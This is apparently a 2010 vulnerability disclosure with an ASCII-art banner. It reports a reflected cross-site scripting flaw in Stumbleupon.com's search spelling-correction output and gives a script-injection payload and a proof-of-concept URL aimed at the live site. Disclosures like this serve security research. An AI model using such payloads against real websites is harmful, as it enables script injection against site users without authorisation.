|=================================================================================================|
|      ___           ___           ___                       ___           ___           ___      |
|     /\  \         /\  \         /\__\          ___        /\  \         /\  \         /\  \     |
|    /::\  \       /::\  \       /::|  |        /\  \      /::\  \       /::\  \       /::\  \    |
|   /:/\:\  \     /:/\:\  \     /:|:|  |        \:\  \    /:/\:\  \     /:/\:\  \     /:/\:\  \   |
|  /:/  \:\  \   /:/  \:\  \   /:/|:|  |__      /::\__\  /::\~\:\  \   /::\~\:\  \   /::\~\:\  \  |
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\  __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |
| \:\  \  \/__/ \:\  \ /:/  / \/__|:|/:/  / /\/:/  /    \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/  / |
|  \:\  \        \:\  /:/  /      |:/:/  /  \::/__/          \:\__\    \:\ \:\__\      |:|::/  /  |
|   \:\  \        \:\/:/  /       |::/  /    \:\__\           \/__/     \:\ \/__/      |:|\/__/   |
|    \:\__\        \::/  /        /:/  /      \/__/                      \:\__\        |:|  |     |
|     \/__/         \/__/         \/__/                                   \/__/         \|__|     |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| Vulnerability............Reflected XSS                                                          |
| Software.................Stumbleupon.com                                                        |
| Date.....................4/26/10                                                                |
| Site.....................http://cross-site-scripting.blogspot.com/                              |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| ##Description##                                                                                 |
|                                                                                                 |
| The code that displays spelling corrections does not encode user submitted data.                |
|                                                                                                 |
|                                                                                                 |
| ##Exploit##                                                                                     |
|                                                                                                 |
| teh<script>alert(0)</script>                                                                    |
|                                                                                                 |
|                                                                                                 |
| ##Proof of Concept##                                                                            |
|                                                                                                 |
| http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>                                |
|                                                                                                 |
|=================================================================================================|